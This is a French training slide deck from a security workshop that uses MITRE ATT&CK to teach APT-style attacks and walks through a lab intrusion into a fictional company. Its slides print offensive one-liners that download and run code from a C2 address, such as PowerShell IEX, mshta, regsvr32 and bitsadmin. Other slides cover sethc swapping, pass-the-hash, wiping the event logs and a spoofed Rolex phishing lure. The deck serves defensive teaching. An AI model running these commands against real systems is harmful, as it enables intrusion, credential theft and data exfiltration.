Cyber attaques APT avec le framework MITRE ATT&CK

ABENE Bertin,
Spécialiste en Cybersécurité
Responsable Sécurité Système d’Information - *
Codeur | Bloggeur |Formateur
@thebenygreen
@237hackers @eyesopsec
http://gacksecurity.blogspot.com
Trainer
Auteur de Beefstrike
2012 - 2014 2015 2016
#237HackersWorkshop
Session 01 : Cyberattaques avancées type APT
Beefstrike utilise CORTANA, un projet né du programme Cyber Fast Track DARPA du Département de la Défense des États-Unis
https://opencatalog.darpa.mil/CFT.html
https://github.com/benyG/Beefstrike/
>whoami
2

Avertissement !
#237HackersWorkshop - Session 01 : Cyberattaques avancées type APT
Au cours de cet atelier, les participants apprendront les
méthodes utilisées dans le cybercrime et pourrons même en
reproduire avec succès. Plus précisément certaines des
attaques répertoriées dans le Framework MITRE ATT&CK.
Le but de cet atelier est de permettre aux participants de mieux
défendre les systèmes placés sous leur responsabilité ou ceux
de leurs clients. De participer de ce fait grâce à leur maîtrise
des risques, à la construction d’un cyber espace plus sûre.
Les participants s’engagent à n’utiliser les informations
communiquées dans cet atelier que dans un cadre strictement
légale et à des fins conformes à l’éthique.
La responsabilité du formateur ne sera en aucun cas engagée si
certains participants venaient à déroger à cette clause ayant
validé leur participation.
3

PLAN
1. Introduction
2. Cyberattaque, Quesaco ?
3. Cyberattaques ciblées
4. Cyberattaques avancées (APT)
5. Référencement des APT
6. MITRE ATT&CK Framework
7. Schémas tactique standard
8. Exploration des techniques APT
9. ATELIER PRATIQUE :
Simulation d’une attaque type APT
10. Protection contre les cyberattaques APT
11. Conclusion
Niveau de complexité
4

Cyberattaque, Quesaco ?
Attaque active : acte (malveillant) modifiant
ou altérant les ressources ciblées par l’attaque
(atteinte à l’intégrité, à la disponibilité et à la
confidentialité des données) .
 Loi du 21/12/2010 relative à la cybersécurité et à la
cybercriminalité au Cameroun
18 million de nouveau malware en 2016 soit 200 000 par jour
 Panda Labs
4000 Attaques de Ransomware par jour
 Computer Crime & Intellectual Property Section (CCIPS)
Motivations des cyberattaques - Juin 2018
-> https://www.hackmageddon.com/2018/07/23/june-2018-cyber-attacks-statistics/
QUELQUES CHIFFRES
5

Cyberattaque ciblée
Une cyberattaque peut générer une crise majeure pouvant
remettre en cause la survie même de l’entreprise.
Principales conséquences :
 Financières
 Juridiques
 Réputationnelles
 Humaines
Les impacts
https://www.lamontagne.fr/clermont-ferrand/economie/commerce-artisanat/2017/09/22/victime-d-un-
piratage-informatique-la-societe-clermont-pieces-va-fermer-boutique_12561803.html
6
National Cyber Security Alliance révèle que:
+60% des PME attaque ciblée cessent leurs activités après 06 mois.

Les 4 constituantes d’une cyberattaque
Attaquants Cibles Motivations Techniques
 Loup solitaire
 Activistes
 Organisation
 Groupes
 Terroristes
 Etats
 Entreprises
 individu
 Activistes
 Organisation
 Groupes
 Aléatoires
 Terroristes
 Etats
 Entreprises
 Financière
 Destruction
 Espionnage
 Vol des
données
 Réputation
 Basiques
 Professionnelles
 Avancées
Loup solitaire  Aléatoires  Financière  Basiques
Groupe  Aléatoires  Réputation  Basiques
7

Attaque Ciblées / Targeted attack
Cyberattaque ayant la particularité de ne pas viser de cible aléatoirement. Au
contraire, elle vise une cible précisément sélectionnées pour des raisons en relation
avec les objectifs de l’attaque
Phase clé de sélection  RECONNAISSANCE
Activistes  Etats  Réputation  Basiques
Entreprises  Entreprises  Vol des données  Professionnelles
8

Schémas tactique des cyberattaques ciblées
Recon
Weaponize
Delivery
Exploitation
Installation
Command
& Control
Actions
Cyber Kill Chain
Lockheed Martin
Cybersecurity kill chain is a framework developed by Lockheed Martin for identification and
prevention of cyber intrusions activity. As attacks may occur in stages, you as defender can
put optics and controls to detect or disrupt the entire process.9

Cyberattaque avancée ( type APT )
Advanced Persistent Threat
Menace Persistante Avancée
Menace de par son
caractère dangereux
pour la cible
Dans toutes les attaques APT.
L’objectifs est de maintenir une
présence furtive long termes
au cœur du système cible.
Les outils et techniques
utilisées trahissent la
bonne organisation, les
compétences élevées des
attaquants et les moyens
financiers conséquents
mis à disposition pour
l’execution de l’attaque.
L'APT utilise un ensemble évolutif de tactiques, de techniques et
de procédures (TTP) pour établir et maintenir une présence dans
l'infrastructure informatique de la cible et exploiter ce potentiel
pour exfiltrer d'importants volumes d'informations sensibles,
corrompre les informations critiques ou dégrader les capacités
10

Cyberattaque avancée ( type APT )
Particularités des constituantes
Attaquants Cibles Motivations Techniques
 Organisations
 Groupes
 Etats
 Entreprises
 Organisations
 Groupes
 Etats
 Entreprises
 Financières
 Espionnage
 Vol de
données
 Avancées
Etats  Etats  Espionnage/Vol  Avancées
Groupes  Entreprises  Financières  Avancées
Etats  Organisations  Espionnage/Vol  Avancées
11

Référencement des APT
https://www.fireeye.com/current-threats/apt-groups.html
12

MITRE ATT&CK Framework
MITRE a mis au point (ATT&CK ™), une base de connaissances et
un modèle pour le comportement des cyber-adversaires, reflétant
les différentes phases du cycle de vie de l’adversaire et les plates-
formes qu’ils sont censés cibler.
Technique Description
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Execution
Collection
Exfiltration
Command and Control
(C2)
Techniques de présence persistante sur un système compromis
Techniques permettant à l'adversaire d'obtenir un niveau plus élevé d'autorisations
Techniques que les adversaires utilisent pour échapper à la détection ou l’éviter
Techniques permettant d'accéder ou de contrôler les informations d'identification des
systèmes, du domaine ou des services
Techniques permettant à l'adversaire d'acquérir des connaissances sur le système et le
réseau interne
Techniques permettant à un adversaire d'accéder et de contrôler des systèmes distants
au sein du réseau cible
Techniques permettant l'exécution de code contrôlé par l'adversaire sur un système
local ou distant
Techniques utilisées pour identifier et collecter des informations
Techniques qui aident l'adversaire à exfiltrer des fichiers et les données d'un réseau cible
Techniques représentant la manière dont les adversaires communiquent avec les
systèmes sous leur contrôle au sein d'un réseau cible
https://attack.mitre.org/wiki/Main_Page
13

APT: Schémas tactique standard
14
Build social
Engineering
Attack scenario

Installation de l’infra C2
Modèle d’infra C2
Segmenter les composantes fonctionnelles de
l’infrastructure en couche offre la flexibilité et la
résilience face aux actions préventives
Empêche l'identification du cœur de l’infra et sème la confusion
Redirection Layer
Utilisé essentiellement pour la phase Delivery
Phishing Layer
Héberge la charge offensive qui attaquera les cibles
Payload Delivery Layer
Contrôle des opérations
Control Layer
victime
Attaquants 15

Installation de l’infra C2
Communication: Channels et Profiles
 Les channels sont les protocoles+services utilisés pour le trafic vers le
C2. En générale le choix vise à éveiller le moins de suspicion
(exple: https+twitter)
 Les profiles C2 permettent à l’attaquant d’imiter un channel, et ainsi
déterminer comment le trafic vers le C2 sera vu sur le réseau.
Dès lors on a 02 options avec les profiles:
1. Faire passer le trafic pour légitime en utilisant l’empreinte réseau des applications metier
utilisées sur le réseau cible (exemple: Exchange Online, Sage Online, …)  Red Teaming
2. Simuler l’empreinte réseau d’une menace spécifiques connues pour évaluer la réponse de
nos défense  Adversary Emulation/Simulation
16
Trafic généré par un sample du bot Zeus
https://digital-forensics.sans.org/blog/2014/03/31/the-
importance-of-command-and-control-analysis-for-
incident-response

Recon
OSINT SCAN
Scan des ports
Enumération des
services
Scan de vulnérabilité
Sources OSINT
• Moteurs de
recherche
• Réseaux sociaux
• Sites d’annonces
• …etc
• Nom des cibles clé
• Email
• Téléphone
• Intérêts
• etc
• IP
• Services
• Applications
• Vulnérabilités
• Etc
C’est de loin l’étape la plus importante
Non-intrusif
Intrusif
Utilisateurs, Organisations, …
data
Big data
17

Tactique: Weaponize
 Binder : Ajouter un fichier exe dans un fichier exe
 Fichier Office piégé avec macro
 Watering hole
 Exploits embarqués (exe, page web, …)
 etc
18
Techniques

Tactique: Execution
Techniques
- CMSTP: executer du code via les fichiers INF [T1191]
cmstp.exe C:eo.inf /au
- DDE : usage de la fonctionnalité Dynamic Data Execution d’Office [T1173]
Insert-> Quick Parts-> Field -> {DDEAUTO c:windowssystem32cmd.exe "/k calc.exe"}
- MSHTA[T1170] :
mshta.exe javascript:a=(GetObject("script:http://192.168.43.203:5000/mshta/eo.sct")).Exec();close();
- POWERSHELL [T1086] :
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.43.203:5000/psh/eo.ps1’)
- REGSVR32 [T1117] : regsvr32.exe /s /u /i:http://192.168.43.203:5000/cmstp/eo.sct scrobj.dll
19

Tactique: Execution
Techniques
- RUNDLL32 [T1085] :
• Rundll32.exe javascript:"..mshtml,RunHTMLApplication
";document.write();GetObject("script:http://192.168.43.203:5000/rundll32/eo.sct").Exec();“
• Rundll32 SHELL32.DLL,ShellExec_RunDLL "calc"
- SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54
- WMI [T1047]: WMIC process call create "cmd.exe /c calc“
WMIC /node:ComputerName process call create “cmd.exe /c calc.exe”
wmic os get /format:"http://192.168.43.203:5000/xsl/eo.xsl"
- WINRM : winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
- WSCRIPT 20

Tactique: Persistence
Techniques
- BROWSER EXTENSION [T1191] : chrome://extensions -> « Load unpacked extension »
- BITSADMIN: Background Intelligent Transfer Service [T1197]
bitsadmin.exe /transfer /Download /priority Foreground http://192.168.43.203:5000/psh/eo.ps1 eo.bat
- REGISTRY [T1060] :
REG ADD HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /V EO /t REG_SZ /F /D calc
- STARTUP FOLDER [T1060] : C:ProgramDataMicrosoftWindowsStart
MenuProgramsStartUp
- LOGON SCRIPT[T1117] : REG ADD HKCUEnvironment /v UserInitMprLogonScript /t
REG_MULTI_SZ /d calc
- WMI Event Subscription [T1084]
- SCHTASKS [T1035] : SCHTASKS /Create /SC ONCE /TN eotask /TR calc /ST 12:54 21

Tactique: Privileges escalation (privesc)
Techniques
- EXPLOIT LOCAUX :
MS10-015 : User Mode to Ring (KiTrap0D), MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k, MS15-078 : Font Driver Buffer Overflow
MS16-016 : 'mrxdav.sys' WebDAV, MS16-032 : Secondary Logon Handle
- EVENTVIEWER UAC BYPASS
- SETHC BINARY SWAPPING [T1015]
takeown.exe C:Windowssystem32sethc.exe & del C:Windowssystem32sethc.exe &
copy C:Windowssystem32cmd.exe C:Windowssystem32sethc.exe
22

Tactique: Lateral Movement
Techniques
- PSEXEC [T1002] :
psexec /accepteula 192.168.10.1 -s cmd.exe
(Run cmd.exe on the remote box as the SYSTEM user account)
psexec /accepteula ip -u domainuser -p lm:ntlm cmd.exe /c dir c:Progra~1
(Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)
- MIMIKATZ [T1191] : mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
- WMI [T1191] :
23

Tactique: Credentials access
Techniques
- CREDENTIALS DUMPING [T1003] : Extraction des Hash des mots de passe
Extraction des mots de passe en clair
- KEYLOGGER: Enregistrement des frappes clavier
- PHISHING: incitation frauduleuse à transmettre des informations
24

Tactique: Defense Evasion
Techniques
- Obfuscation [T1027] : Import-Module ./Invoke-Obfuscator.psd1;
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
- Encryption: aes, blowfish, rsa
- Encoding [T1027] exemple: ascii, unicode, url encoding, base64
https://javascriptobfuscator.com/Javascript-Obfuscator.aspx
- Bypass Application whitelisting: Regsvr32, Rundll32, Installutil, Mshta, CMSTP…
- CODE SIGNING[T1116]
- DISABLING SECURITY TOOLS [T1089]: wevtutil el | Foreach-Object {wevtutil cl $_}
- TIMESTOMP [T1099] 25

Tactique: Discovery
26
• Users account Discovery
• File and Directory Discovery
• Remote System Discovery
• Services Discovery
• Software discovery
• Configurations Discovery
• etc

Tactique: Compression & Exfiltration
Techniques
- ZIP
- RAR
- etc
Techniques
- Exfiltration via service HTTP
- Exfiltration via serveur FTP
- Exfiltration via des API de service Web
(Github, Pastebin, …etc)
27
Exfiltration
Compression

Scenario du LAB
L’entreprise EMIZOPLAYA CORP exerce ses activités dans le domaine de la logistique
et elle se porte plutôt bien depuis plus de 05 ans. Son chiffre d’affaire ne cesse de
croître.
EMIZOPLAYA CORP s’est récemment vu attribuer un important marché n7030 d’une
valeur de 530 million.
29Threat actor : APT98
Vous allez jouer le rôle de cette entité
Pour des motivations X et Y une entité a été contactée pour établir une
présence durable au sein du système d’information de l’entreprise
EMIZOPLAYA CORP à fin d’obtenir des données liés à ses succès et à
l’attribution du marché n7030

Configuration du Réseau du LAB
30
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT
Naviguons pour tester
les accès aux fichiers

Choix de l’outil du LAB
• Cobalt Strike
• Caldera
• Atomic Redteam
• Invoke-Adversary
• RedTeam Automation
• Empire
• etc
31

Empire PowerShell
 Les Listeners sont les canaux qui reçoivent des connexions de notre machine cible.
 Les stagers sont des charges « explosives » utilisées pour créer une connexion avec le C2
 Les agents sont les connexions créé avec les machines attaquées avec succès.
 Les modules sont des commandes spécifiques exécutable sur une machine victime
Listeners Stagers
Agents
32
Modules
Début
victime
Results

Setup C2
GET request URI | User Agent | Header #1Format de profile :
33
Changer de profile
Supprimer la DB empire.db, editer là et redémarrer empire  exemple profile BING search :
set DefaultProfile
/owa/mail/inbox.srf,/owa/mail/drafts.srf,/owa/mail/archive.srf|Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko|Accept:*/*
set ServerVersion "Microsoft-IIS/8.5«
page = """<!DOCTYPE html><html > … </html> """
Modifier la réponse HTTP par défaut en éditant le fichier : lib/common/http.py

Scenario
EXECUTION DE LA PHASE RECON:
Site web
linkedin
Site annonce
twitter intérêt
contact
Social
engineering
scenario
34
Nom CP
Cpte twitter Rolex
Nom CP Contact CP
Résultats
Jessica MAMU BEKOSSI
Employé à EMIZOPLAYA
Chef de Projet à EMIZOPLAYA CORP
Diplômé de l’ESSEC, Certifié PMP
Passionnée de ROLEX
Twitter: https://twitter.com/jessmak18
Contact: jessmamu02@yahoo.fr

Scenario
WEAPONIZING PHASE :
Un fichier excel avec une macro malveillante
qui établi la connection initiale avec le C2
35
Construction du scénario d’ ingénierie sociale
Jessisa MAMU BEKOSSI = Cible
La maison ROLEX contacte JESSICA pour l’informer de sa sélection pour participer
gratuitement au lancement du programme « Rolex Elite Fans »
Qui a pour but de permettre aux Fans de la marque de montre luxe de participer au
choix des montres qui apparaitront sur le catalogue de l’année 2019.
Il est précisé qu’aucune information personnelle ne sera demandée
aux participants à ce programme
DELIVERY PHASE :
Service de email spoofing : https://emkei.cz/ Bill
Mosse, un responsable de chez ROLEX envoi le
fichier
bill.mosse@rolex.com

Scenario
DEFENSE EVASION PHASE:
- Obfuscation du code
- Modification du profile C2
- Bypass Firewall usage port 80
36
Techniques
Résultats
On observera aussi par la suite

Scenario
DISCOVERY PHASE:
On veut connaître:
- Nom machine et Compte utilisée
- Les machines en présence
- Les utilisateurs
- Les partages
- Les services
- Les contrôleurs de domaine
37
Hostname + Whoami
Aprscan
Invoke-DCSync
Share_finder + Get_ChildItem
Portscan
Get_domain_controller
Commandes/Techniques
Résultats
Session: jmamu - Session non privilégiée
Machines présentes: 192.168.10.21, 22, 1
Domaine: emizoplaya.com
DC: dc01.emizoplaya.com
Utilisateurs: jmamu, cfotso, azoplaya, mmbondo, pouedraogo, …
Partages: 192.168.10.1Business

Scenario
PRIVILEGES ESCALATION PHASE:
- Check admin state
- bypassUAC_eventviewer
 Nouvel agent:
- Re-check admin state
- Whoami
- Rename new agent
38
Commandes/Techniques
Résultats
Nouvelle session: jmamu - LOCAL PRIVILEGIEE

Scenario
PERSISTENCE PHASE:
- Registry method (application)
- WMI method (juste un coup d’œil)
39
Techniques
Résultats
Après redémarrage, team APT98 conserve l’accès à la cli01, compte non privilégié
Mot de passe en claire + HASH pour jmamu et cfotso
CREDENTIAL ACCESS PHASE:
- Logonpasswords
Commandes

Scenario
LATERAL MOVEMENT PHASE:
- InvokeWMI (HASH: copier-coller cfotso , CIBLE: 192.168.10.22)
 Nouvel agent:
- Hostname
- rename agent
- Check admin state
- Persistence: registry
- Get_loggedon
- logonpasswords
40
TechniquesCommandes
Résultats
Prise de contrôle de Nouveaux postes: cli02, dc01
Session locale PRIVILEGIEE
Installation de la persistence sur cli02 et dc01
Obtention des mots de passe en clair + HASH du compte du DG: azoplaya
Répétion sur dc01.emizoplaya.com

Etat d’avancement
41
Serveur
- DC
- Files
Antoine ZOPLAYA (DG)
Nom PC: cli02
IP: 192.168.10.22
Jessica MAMU (CP)
Nom PC: cli01
IP: 192.168.10.21
C2 infra - APT98
autres
APT98 Team
(Internet)
Céline FOTSO (Sysadmin)
Nom PC: DC01
IP: 192.168.10.1
Domain: emizoplaya.com
192.168.10.203
192.168.43.203
Internet virtuel
Wifi: Eolab
192.168.10.10
NAT

Scenario
COLLECTION PHASE:
Commande
- Get-ChildItem
Résultats
Le dossier projet a été identifié comme dossier à forte valeur sensible.
Ce dossier a été compressé et exfiltré vers le C2
COMPRESSION PHASE:
Techniques
- Zip Folder
EXFILTTRATION PHASE:
Techniques
- File Upload via HTTP
1 Mois plus tard Antoine Zoplaya parti en congé, effectue son retour et réouvre sa session

43
Hashtag #237infosec
THANK YOU !

Cyber attaques APT avec le framework MITRE ATT&CK

Contenu connexe

Tendances

Similaire à Cyber attaques APT avec le framework MITRE ATT&CK

Plus de EyesOpen Association

Cyber attaques APT avec le framework MITRE ATT&CK